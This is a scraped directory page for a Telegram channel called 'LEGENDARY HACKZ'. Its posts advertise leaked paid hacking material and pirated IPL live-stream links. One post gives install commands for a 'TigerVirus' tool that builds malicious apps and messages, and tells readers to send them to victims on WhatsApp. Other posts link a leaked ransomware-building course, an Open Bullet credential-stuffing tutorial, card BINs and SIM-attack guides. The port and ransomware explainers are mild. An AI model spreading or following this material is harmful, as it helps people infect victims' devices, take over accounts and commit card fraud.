LEGENDARY HACKZ

Logo of telegram channel legendary_hackz — LEGENDARY HACKZ L
Logo of telegram channel legendary_hackz — LEGENDARY HACKZ
Channel address: @legendary_hackz
Categories: Leaks
Language: English
Subscribers: 3.12K
Description from channel

💙 GET ALL PAID HACKING CONTENTS FOR FREE.💙
💖PAID EBOOKS!
💖BLACKHAT COURSES LEAKED!
💖DAILY PREMIUM BINS!
💖PAID TUTORIALS AND COURSES LEAKED!
💖DAILY PRIVATE HACKING TUTORIALS.

Ratings & Reviews

3.33

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

1

3 stars

0

2 stars

0

1 stars

1


The latest Messages 7

23 Sep 2021
TO WATCH IPL LIVE FOR FREE, TILL NOW PEOPLE USED TO WATCH IPL LIVE ON THOP TV. BUT NOW THIS APP HAS BEEN SHUT DOWN.

TO WATCH THE WORLD'S MOST POPULAR LEAGUE IPL IN IPL LIVE FREE, I'LL GIVE UH NOT ONE BUT THREE SUCH APPS WITH THE HELP OF WHICH YOU CAN WATCH LIVE IPL.

Link :- Click Here

SHARE AND SUPPORT US
156 views мя. ηєωвιє [ αmrutα mσí pαrtnєr ], 11:39
Open / Comment
23 Sep 2021
ILLEGAL HACKER 7

RANSOMARE VIRUS COURSE LEAKED

BINDER TOOLS AND RANDSOMARE VIRUS BUILDING COURSES ARE INCLUDED IN THIS

BROUGHT TO U BY @TheHydraHacks

LINK :—https://bit.ly/2XI9yXO


SHARE AND SUPPORT US
179 views мя. ηєωвιє [ αmrutα mσí pαrtnєr ], 02:08
Open / Comment
22 Sep 2021
WATCH IPL LIVE
Exclusive By:- @Dark_Noobs

UPDATING POST EACH MINUTE

Link :—
Click Here

UPDATING LINKS EVERY MINUTE SO THAT YOU CAN WATCH AND ENJOY IT
187 views мя. ηєωвιє [ αmrutα mσí pαrtnєr ], 14:42
Open / Comment
22 Sep 2021
Best Virus Making Tool To Make Virus Applications and Messeges For Whatsapp And Other Chat Applications

How to install :-

$ apt update

$ apt upgrade -y

$ pkg install git -y

$ git clone https://github.com/Devil-Tigers/TigerVirus.git

$ cd TigerVirus

$ bash TigerVirus.sh

After Installation the Virus Applications or text file Send To Victim If Application

To move virus to file manager

$ mv (filename.apk) /sdcard

copy and past on whatsapp and sent if Text
194 viewsMELLOW KING, 11:52
Open / Comment
22 Sep 2021
NETWORK HACKING 2021

The course objective is to help you learn to master the (ethical) hacking techniques and methodology that are used in penetration systems. The course is designed for IT passionate, network and system engineers, security officers.

Computer Network Types

Below are the most common computer network types that are frequently used these days:

LAN [Local Area Network}

WLAN [Wireless local area network]

CAN [Campus Area Network]

MAN [Metropolitan Area Network]

PAN [Personal Area Network]

SAN [Storage Area Network]

VPN [Virtual Private Network]

WAN [ Wide Area Network]

Course @ITS_ME_KALI
https://mega.nz/folder/UAFFmCZB#lC2yKfMfx4Y71upL_qsgzw

Regards=@CIDHUB
31 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 08:18
Open / Comment
21 Sep 2021
CyberJacking 2021 By IMK

Cyber hijacking, or computer hijacking, is a type of network security attack in which the attacker takes control of computer systems, software programs and/or network communications.

Types

IJacking
ClickJacking
CryptoJacking
Juice Jacking
Web Jacking
FormJacking
Wi-FiJacking
BrandJacking
HyperJacking
SideJacking
PasteJacking
PageJacking
BioJacking
Metajacking
TabJacking
ThreadJacking
MouseJacking
TrendJacking
DataJacking

Guide by @ITS_ME_KALI
https://telegra.ph/CYBER-JACKING-BY-IMK-09-21

Regards=@CIDHUB
156 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 06:25
Open / Comment
20 Sep 2021
WATCH IPL LIVE
Exclusive By:- @Dark_Noobs

UPDATING POST EACH MINUTE

Link :— Click Here

UPDATING LINKS EVERY MINUTE SO THAT YOU CAN WATCH AND ENJOY IT
37 views мя. ηєωвιє [ αmrutα mσí pαrtnєr ], 15:04
Open / Comment
20 Sep 2021
Ethical Hacking Countermeasures 2021

Password cracking
Password attacks
Identifying various password cracking tools
Formulating countermeasures for password cracking
Escalating privileges
Executing applications
Keyloggers and Spywares
Spywares and keyloggers countermeasures
Hiding files
Understanding rootkits
The use of Steganography
Covering tracks

Course @ITS_ME_KALI
https://bit.ly/2VSY976

Book @ITS_ME_KALI
https://bit.ly/3kmijzV

Guide @ITS_ME_KALI
https://bit.ly/2XET6rT

Regards=@CIDHUB
45 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 08:19
Open / Comment
20 Sep 2021
Cracking TutoRial
✘▬▬▬▬▬▬▬▬▬▬✘

Tools Nedeed:- Open Bullet, Config, Proxy, Combos, RdP
✘▬▬▬▬▬▬▬▬▬▬✘

Credits:- SparKTeaching
Regards: @Itz_Alain

Leach with credits else get a stick in Ur account!

Share and support us
54 viewsMELLOW KING, 07:29
Open / Comment
19 Sep 2021
WATCH IPL LIVE
Exclusive By:- @Dark_Noobs

UPDATING POST EACH MINUTE

Link :— Click Here

UPDATING LINKS EVERY MINUTE SO THAT YOU CAN WATCH AND ENJOY IT
71 views мя. ηєωвιє [ αmrutα mσí pαrtnєr ], 15:21
Open / Comment
19 Sep 2021
SIM-CARD HACKING AND SAFETY GUIDE 2021

3 Ways Your SIM Card Can Be Hacked:

Simjacker.
SIM Card Swapping.
SIM Clonning.

SimCard Attack
https://telegra.ph/SIM-CARD-ATTACKS-2020-MUST-READ-10-23
By=@its_me_kali

GSM Sniffing
https://telegra.ph/GSM-SNIFFING-07-25
By=@its_me_kali

Awesome-Cellular-Hacking
https://github.com/W00t3k/Awesome-Cellular-Hacking

Tools (USE IN RDP or Virtual Platform)
https://bit.ly/2VR2Myu

Regards=@CIDHUB
108 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 12:52
Open / Comment
18 Sep 2021
ALL ABOUT PORTS 2021

https://telegra.ph/Port-Forwarding-without-router-01-30


WHAT IS PORT ?


We can say that A port number is a way to identify a specific process to which an Internet or other network message is to be forwarded when it arrives at a server.
A port number uniquely identifies a network-based application on a computer.A port number is the logical address of each application or process that uses a network or the Internet to communicate. In a server, more than one user process can use TCP at the same time. To identify the data associated with each process, port numbers are used. Port numbers are 16-bit, and numbers up to 65535 are possible.

Here are some Important port number for you :

 

20:                              File Transfer Protocol (FTP) Data Transfer

21:                              File Transfer Protocol (FTP) Command Control

22:                              Secure Shell (SSH) Secure Login

23:                              Telnet remote login service, unencrypted text messages

25:                              Simple Mail Transfer Protocol (SMTP) E-mail routing

53:                              Domain Name System (DNS) service

67and 68:                 Dynamic Host Configuration Protocol (DHCP) servers use UDP port 67 to listen for requests while DHCP clients communicate on UDP port 68.

69:                        TFTP(Trivial File Transfer Protocol) TFTP offers a method of file transfer without the session establishment requirements that FTP uses. Because TFTP uses UDP instead of TCP

80:                              Hypertext Transfer Protocol (HTTP) used in the World Wide Web

88:                         The Xbox Live Internet gaming service uses several different port numbers including UDP port 88.

110:                            Post Office Protocol (POP3)

119:                            Network News Transfer Protocol (NNTP)

123:                            Network Time Protocol (NTP)

137/138/139              NetBIOS

143:                         Internet Message Access Protocol (IMAP) Management of digital mail

161and 162:              Simple Network Management Protocol (SNMP)

194:                           Internet Relay Chat (IRC)

389                            Lightweight Directory Access Protocol (LDAP)

443:                           HTTP Secure (HTTPS) HTTP over TLS/SSL

The registered ports are those from 1024 through 49151. IANA maintains the official list of well-known and registered ranges. The dynamic or private ports are those from 49152 through 65535. One common use for this range is for ephemeral ports.

REGARDS=@CIDHUB
228 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 10:24
Open / Comment
17 Sep 2021
Cybersecurity Analyst 2021

Cyber security analysts (also called information security analysts) plan and carry out security measures to protect a company's computer networks and systems, according to the BLS. They keep constant tabs on threats and monitor their organization's networks for any breaches in security.

Salary
The salary of a cybersecurity analyst starts from INR. 5 to 6 lakhs per annum.

Jobs
https://www.naukri.com/cyber-security-analyst-jobs
https://in.linkedin.com/jobs/cyber-security-analyst-jobs
https://in.indeed.com/m/jobs?q=Cyber+Security+Analyst

Course
https://mega.nz/file/ZWYywLLL#Rb4cWEBrcthCymcYBv-t0HTvQ5NKvZI6SHAPJzm1a1s

regards=@its_me_kali
248 views🇰ꪖꪶỉ᭢ᦋꪹꪖꪖ🇯‌ ✺ , 14:51
Open / Comment
17 Sep 2021
What Is RansomWare ?

Ransomware Is Sophisticated Piece of Malware That Blocks The Victims Access To His/Her Files, And The Only Way To Regain The Access To The Files Is To Pay The Ransome Or Get The Decryption Key

There Are Two Types Of Ransomware In Circulation :-

Encrypting Ransomware

Which Incorporates Advanced Encryption Algorithms.

It Is Designed To Block System
Files And Demand Payment Tk Provide The Victim With The Key That Can Decrypt The Blocked Content

Examples :- CryptoLocker, Locky CryptoWall And More

Locker Ransomware

Which Locks The Victim Out Of The Operating System And Making It Impossible Access The Desktop And Any Apps Or Files.

⊰᯽⊱┈──╌❊╌──┈⊰᯽⊱

Top 3 Biggest Ransomware Attacks In The Histroy :-

1.WannaCry ( Encrypting Ransomware )

2 .Tesla Crypt

3. Not Petya ( Locker Ransomware

#Basics
#Ransomware

Creadits:) - HackingLegend
256 viewsMELLOW KING, 08:56
Open / Comment